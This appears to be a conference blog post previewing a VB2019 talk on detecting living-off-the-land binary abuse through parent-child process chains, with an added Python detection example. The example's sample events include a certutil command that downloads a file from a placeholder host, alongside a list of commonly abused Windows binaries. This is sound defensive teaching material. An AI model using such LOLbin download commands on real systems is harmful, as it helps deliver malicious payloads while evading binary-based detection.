Living-off-the-land binaries, often referred to as LOLbins, are legitimate (Windows) binaries used for malicious purposes. Their use has increased in malware campaigns in recent years and serves as a reminder that a defensive approach focused purely on detecting malicious binaries is no longer sufficient: the binary being abused is signed, benign and already present on the system.
Rather than focusing on the binaries themselves, it is therefore important to study the parent-child process chain that leads to a binary being executed, in order to determine whether a given execution is likely malicious.
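The following is an added illustration of that idea, not code from the paper or from the Problem Child framework: a small ancestry-aware check run over a handful of constructed Sysmon-style process-creation records. The same LOLbin (certutil.exe) appears twice with the same file path; only the chain that descends from a document handler is flagged, which is the distinction a binary-centric detection cannot make. The LOLbin and document-handler name sets, the event records and the field names are all assumptions made for the example.

```python
"""Ancestry-aware LOLbin triage over constructed Sysmon-style process
creation records. Added example: the rule, the event set and the names are
illustrative and are not the Problem Child framework from the paper."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Binaries commonly abused as LOLbins. Their presence alone is not a verdict.
LOLBINS = {"certutil.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe",
           "bitsadmin.exe", "msiexec.exe", "wmic.exe", "cscript.exe", "wscript.exe"}

# Parents from which a LOLbin child is rarely legitimate: document handlers
# that macro or exploit payloads typically launch from (assumed set).
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe",
                     "outlook.exe", "acrord32.exe"}

# Constructed sample records (hypothetical; fields loosely mirror Sysmon
# Event ID 1: process id, parent process id, image path, command line).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},
]


@dataclass
class Process:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


def basename(path: str) -> str:
    """Lower-cased file name, so path and case variations compare equal."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events: List[dict]) -> Dict[int, Process]:
    """Index the records by pid so parents can be looked up in O(1)."""
    return {e["pid"]: Process(e["pid"], e["ppid"], e["image"], e.get("cmdline", ""))
            for e in events}


def ancestry(procs: Dict[int, Process], pid: int) -> List[str]:
    """Root-first chain of image names for pid. Stops when the parent was not
    logged (boot-time process, pid reuse, log gap) or when a cycle appears."""
    chain: List[str] = []
    seen = set()
    cur: Optional[Process] = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = procs.get(cur.ppid)
    chain.reverse()
    return chain


def flag_lolbin_chains(events: List[dict]) -> List[dict]:
    """Report each LOLbin execution whose ancestors include a document handler.
    The verdict comes from the chain, not from the binary name."""
    procs = build_tree(events)
    findings = []
    for pid, proc in procs.items():
        name = basename(proc.image)
        if name not in LOLBINS:
            continue
        chain = ancestry(procs, pid)
        offenders = [a for a in chain[:-1] if a in DOCUMENT_HANDLERS]
        if offenders:
            findings.append({"pid": pid, "image": name, "chain": " > ".join(chain),
                             "reason": f"{name} descends from {offenders[0]}",
                             "cmdline": proc.cmdline})
    return findings


if __name__ == "__main__":
    for f in flag_lolbin_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['chain']}  [{f['reason']}]")
```

Run as a script it prints only pid 400 (explorer.exe > winword.exe > cmd.exe > certutil.exe); pid 600, the same certutil.exe launched from an interactive shell, is left alone. Real telemetry needs the parent GUID rather than the raw ppid because of pid reuse, and a production rule would weight the whole graph rather than a single ancestor, which is the gap a graph-based approach is meant to close.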
This is the premise of a paper to be presented at VB2019 by Endgame researcher Bobby Filar, who will discuss Problem Child, a graph-based framework designed to address these issues. In his research he also applied the framework to activity attributed to two known APT actors: OceanLotus and APT3.
With VB2019 just one month away, it is time to book your ticket for the most international threat intelligence event of the year!